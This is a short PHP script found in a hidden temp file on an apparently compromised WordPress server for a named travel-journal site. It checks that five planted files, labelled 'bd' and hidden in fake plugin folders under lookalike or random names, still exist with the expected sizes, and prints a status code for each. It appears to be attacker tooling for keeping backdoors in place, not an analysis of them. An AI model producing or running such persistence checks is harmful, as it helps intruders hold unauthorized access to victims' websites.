File: //var/tmp/.hld
<?php $r = '/home/shingkhor/tinyadventurejournal.com'; $x = ["/wp-content/plugins/custom-1751112658/wp-config.php"=>"bd@@424006@@727",
"/902e82.php"=>"bd@@490937@@105",
"/wp-content/plugins/custom-1748009829/sldebar.php"=>"bd@@753337@@727",
"/wp-content/plugins/custom-1748027732/paqe.php"=>"bd@@694978@@727",
"/d7f4ea.php"=>"bd@@16116@@105"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');